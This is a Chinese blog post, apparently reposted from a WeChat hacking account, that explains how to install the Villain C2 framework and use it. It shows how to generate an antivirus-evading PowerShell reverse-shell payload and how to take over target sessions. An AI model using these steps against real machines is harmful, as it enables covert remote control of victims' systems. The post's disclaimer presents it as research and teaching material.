本文为大家介绍一款基于Windows和Linux和C2框架Villain的安装和使用。支持文件上传和多个会话之间的切换。
关于
Villain
是一个C2框架,可以处理多个基于TCP和HoaxShell的反向shell。并且自动化加密payload来逃逸杀毒软件。
安装
git clone https://github.com/t3l3machus/Villain
cd ./Villain
pip3 install -r requirements.txt
运行
使用教程
这里我们以生成windows系统为例。生成一个shell.
generate payload=windows/netcat/powershell_reverse_tcp lhost=eth0 encode
我们在cmd中运行powershell命令。效果如下
这时候,在终端中就可以看到,目标已经上线了。
查看当前会话
我们输入命令sessions
便可以看到,与当前主机连接的会话。
连接会话
我们利用shell
+会话id
便可以与当前会话建立连接。如
shell 9aa63a-b88b6b-901ce3
如上,我们成功进入了系统的shell。
注意事项
-
Villain 具有内置的自动混淆有效载荷功能,可免杀(实测效果一般) -
每个生成的有效负载只会工作一次。已经使用过的有效负载不能重新用于建立会话。 -
如果两个设备不在同一局域网,需要做端口映射。
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):一款基于C2框架的Windows&Linux后门工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论